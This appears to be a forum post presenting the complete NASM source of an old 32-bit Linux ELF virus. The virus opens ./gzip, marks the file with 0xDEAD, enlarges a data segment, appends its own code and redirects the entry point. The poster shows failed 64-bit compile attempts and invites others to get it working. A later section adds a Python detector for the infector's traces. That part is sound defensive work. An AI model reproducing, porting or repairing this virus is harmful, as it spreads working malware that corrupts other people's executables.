This is a very old Linux file I found on an old HDD: it is a Linux virus in assembler source code. It is compiled with nasm into an object file and then with GCC into an executable. I would not want to actually run this, but it is still very interesting code.
```nasm
;****************************************************************************
; Linux ELF file infection
;****************************************************************************
; Compile with:
; nasm -f elf hole.asm -o hole.o
; gcc hole.o -o hole

[section .text]
[global main]

hoste:
        ret

main:
        pusha                           ; Beginning of the virus
                                        ; Push all the parameters
        call getdelta
getdelta:
        pop ebp
        sub ebp,getdelta

        mov eax,125                     ; I modify the attributes with
        lea ebx,[ebp+main]              ; mprotect for write in protec-
                                        ; ted pages
        and ebx,0xFFFFF000              ; Round up to pages
        mov ecx,03000h                  ; r|w|x attributes
        mov edx,07h                     ; We will only need this in
        int 80h                         ; the 1st gen, because we'll
                                        ; copy us in the data section

        mov ebx,01h
        lea ecx,[ebp+texto]
        mov edx,0Ch                     ; Show a Hello World with a
        call sys_write                  ; write to stdout

        mov eax,05
        lea ebx,[ebp+archivo]           ; open file to infect (./gzip)
        mov ecx,02                      ; read/write
        int 80h
        mov ebx,eax                     ; Handle in EBX

        xor ecx,ecx
        xor edx,edx                     ; Go to beginning of file
        call sys_lseek

        lea ecx,[ebp+Elf_header]        ; Read the ELF header to our
        mov edx,24h                     ; variable
        call sys_read

        cmp word [ebp+Elf_header+8],0xDEAD  ; Check for previous infection
        jne infectar
        jmp salir

infectar:
        mov word [ebp+Elf_header+8],0xDEAD  ; The mark is on the 2 first
                                            ; fill bytes in the ident struc
        mov ecx,[ebp+e_phoff]           ; e_phoff is a ptr to the PH
        add ecx,8*4*3                   ; Obtain 3rd entry of data seg
        push ecx
        xor edx,edx
        call sys_lseek                  ; Go to that position

        lea ecx,[ebp+Program_header]    ; Read the entry
        mov edx,8*4
        call sys_read

        add dword [ebp+p_filez],0x2000  ; increase segment size in
        add dword [ebp+p_memez],0x2000  ; memory and in the file

; The size to add must be superior to the size of the virus, because besides
; copy the virus, we have also to copy the section table, located before
; and it is not mapped into mem by default. It could be shifted (for avoid
; copying it) but for simplycity reasons i don't do that.

        pop ecx
        xor edx,edx
        call sys_lseek                  ; back to entry position

        lea ecx,[ebp+Program_header]
        mov edx,8*4
        call sys_write                  ; Write entry to the file

        xor ecx,ecx
        mov edx,02h
        call sys_lseek                  ; Go to file end

; EAX = File Size, that will be phisical offset of the virus

        mov ecx,dword [ebp+oldentry]
        mov dword [ebp+temp],ecx
        mov ecx,dword [ebp+e_entry]
        mov dword [ebp+oldentry],ecx
        sub eax,dword [ebp+p_offset]
        add dword [ebp+p_vaddr],eax
        mov eax,dword [ebp+p_vaddr]     ; EAX = New entrypoint
        mov dword [ebp+e_entry],eax

; These are the calculations of the new entry address, that will point to the
; code of the virus. For calculate the virtual address of the virus in memory
; i move the pointer to the end of the file with lseek, so the EAX register
; will have the phisical size of the file (i.e. the physical position of the
; virus in the file).
; If to that position i substract the physical position of the beginning of
; the data segment, i will have the virus position relative to the beginning
; of the data segment, and if i add to it the virtual address of the segment
; i will obtain the virtual address of the virus in memory.

        lea ecx,[ebp+main]
        mov edx,virend-main
        call sys_write                  ; Write the virus to the end

        xor ecx,ecx
        xor edx,edx
        call sys_lseek                  ; Set pointer to beginning of
                                        ; the file
        lea ecx,[ebp+Elf_header]
        mov edx,24h
        call sys_write                  ; Modify header with new EIP

        mov ecx,dword [ebp+temp]
        mov dword [ebp+oldentry],ecx

salir:
        mov eax,06                      ; Close the file
        int 80h

        popa
        db 068h                         ; Opcode of a PUSH
oldentry: dd hoste                      ; back to infected program
        ret

sys_read:                               ; EBX = Must be File Handle
        mov eax,3
        int 80h
        ret

sys_write:                              ; EBX = Must be File Handle
        mov eax,4
        int 80h
        ret

sys_lseek:                              ; EBX = Must be File Handle
        mov eax,19
        int 80h
        ret

dir      dd main
         dw 010h
archivo  db "./gzip",0                  ; File to infect
datos    db 00h
temp     dd 00h                         ; Save oldentry temporally

;**************** Data Zone *************************************************

newentry  dd 00h                        ; New virii EIP
newfentry dd 00h
myvaddr   dd 00h
texto     db 'HELLO WORLD',0h

Elf_header:
e_ident:     db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
e_type:      db 00h,00h
e_machine:   db 00h,00h
e_version:   db 00h,00h,00h,00h
e_entry:     db 00h,00h,00h,00h
e_phoff:     db 00h,00h,00h,00h
e_shoff:     db 00h,00h,00h,00h
e_flags:     db 00h,00h,00h,00h
e_ehsize:    db 00h,00h
e_phentsize: db 00h,00h
e_phnum:     db 00h,00h
e_shentsize: db 00h,00h
e_shnum:     db 00h,00h
e_shstrndx:  db 00h,00h
jur:         db 00h,00h,00h,00h

Program_header:
p_type       db 00h,00h,00h,00h
p_offset     db 00h,00h,00h,00h
p_vaddr      db 00h,00h,00h,00h
p_paddr      db 00h,00h,00h,00h
p_filez      db 00h,00h,00h,00h
p_memez      db 00h,00h,00h,00h
p_flags      db 00h,00h,00h,00h
p_align      db 00h,00h,00h,00h

Section_entry:
sh_name      db 00h,00h,00h,00h
sh_type      db 01h,00h,00h,00h
sh_flags     db 03h,00h,00h,00h      ;alloc
sh_addr      db 00h,00h,00h,00h
sh_offset    db 00h,00h,00h,00h
sh_size      dd (virend-main)*2
sh_link      db 00h,00h,00h,00h
sh_info      db 00h,00h,00h,00h
sh_addralign db 01h,00h,00h,00h
sh_entsize   db 00h,00h,00h,00h

virend:
;****************************************************************************
```
Compiling it partway has worked.
```
┌──(john㉿DESKTOP-PF01IEE)-[/mnt/c/Users/Intel i5/Documents]
└─$ nasm -f elf virus.asm -o virus.o
```
But as this is 32-bit code, I cannot get it to compile on a 64-bit system with GCC.
I try to build a 64-bit object file, but it fails.
```
┌──(john㉿DESKTOP-PF01IEE)-[/mnt/c/Users/Intel i5/Documents]
└─$ nasm -f elf64 virus.asm -o virus.o
virus.asm:16: error: instruction not supported in 64-bit mode
virus.asm:20: error: instruction not supported in 64-bit mode
virus.asm:60: error: instruction not supported in 64-bit mode
virus.asm:76: error: instruction not supported in 64-bit mode
virus.asm:130: error: instruction not supported in 64-bit mode
```
Maybe someone else can get this working, though; it is interesting code.
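A defender-side check for the traces the posted infector leaves in a file, written as an added example for this thread (not code from the original post or its author). It parses the ELF32 header and program headers and flags the 0xDEAD word in the e_ident padding, a PT_LOAD whose p_filesz now runs past end of file (the code adds 0x2000 to the segment while appending far less), and an entry point inside a writable segment. The ELF sample is constructed inline; all function names are my own.

```python
import struct

ELF_MAGIC = b"\x7fELF"
INFECTION_MARK = 0xDEAD   # word the posted infector stores at e_ident[8]
PT_LOAD, PF_W = 1, 0x2

def parse_elf32(data):
    """Parse an ELF32 little-endian header and its program header table."""
    if data[:4] != ELF_MAGIC or data[4] != 1:       # EI_CLASS 1 = ELFCLASS32
        raise ValueError("not an ELF32 file")
    hdr = struct.unpack_from("<HHIIIIIHHHHHH", data, 16)
    e_entry, e_phoff, e_phentsize, e_phnum = hdr[3], hdr[4], hdr[8], hdr[9]
    phdrs = []
    for i in range(e_phnum):
        p = struct.unpack_from("<8I", data, e_phoff + i * e_phentsize)
        phdrs.append(dict(type=p[0], offset=p[1], vaddr=p[2],
                          filesz=p[4], memsz=p[5], flags=p[6]))
    pad = struct.unpack_from("<H", data, 8)[0]      # EI_PAD bytes 8..9
    return dict(ident_pad=pad, entry=e_entry, phdrs=phdrs)

def infection_indicators(data):
    """Return the heuristics, derived from the posted infector, that fire."""
    elf = parse_elf32(data)
    hits = []
    if elf["ident_pad"] == INFECTION_MARK:
        hits.append("marker 0xDEAD in e_ident padding")
    for ph in elf["phdrs"]:
        if ph["type"] != PT_LOAD:
            continue
        if ph["offset"] + ph["filesz"] > len(data):
            hits.append("PT_LOAD p_filesz extends past end of file")
        in_seg = ph["vaddr"] <= elf["entry"] < ph["vaddr"] + ph["memsz"]
        if in_seg and ph["flags"] & PF_W:
            hits.append("entry point inside a writable PT_LOAD segment")
    return hits

def build_sample(infected):
    """Constructed ELF32 sample (text + data segment); when infected=True the
    header is altered the way the posted code alters its target."""
    ident = bytearray(b"\x7fELF\x01\x01\x01" + b"\x00" * 9)
    text = [PT_LOAD, 0, 0x08048000, 0x08048000, 0x1000, 0x1000, 5, 0x1000]
    data = [PT_LOAD, 0x1000, 0x08049000, 0x08049000, 0x100, 0x100, 6, 0x1000]
    entry, tail = 0x08048100, b"\x00" * 0x1100      # original file body
    orig_size = 52 + 64 + len(tail)                 # ehdr + 2 phdrs + body
    if infected:
        struct.pack_into("<H", ident, 8, INFECTION_MARK)
        data[4] += 0x2000                           # p_filesz += 0x2000
        data[5] += 0x2000                           # p_memsz  += 0x2000
        entry = data[2] + (orig_size - data[1])     # p_vaddr + (EOF - p_offset)
        tail += b"\x90" * 0x200                     # appended bytes (constructed)
    hdr = struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, entry, 52, 0, 0, 52, 32, 2, 40, 0, 0)
    return bytes(ident) + hdr + struct.pack("<8I", *text) + struct.pack("<8I", *data) + tail
```

The clean sample yields no indicators; the altered one trips all three checks.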
This is interesting code, indeed!
A funny thought I had was that maybe it's code for neither a 32-bit nor a 64-bit OS :))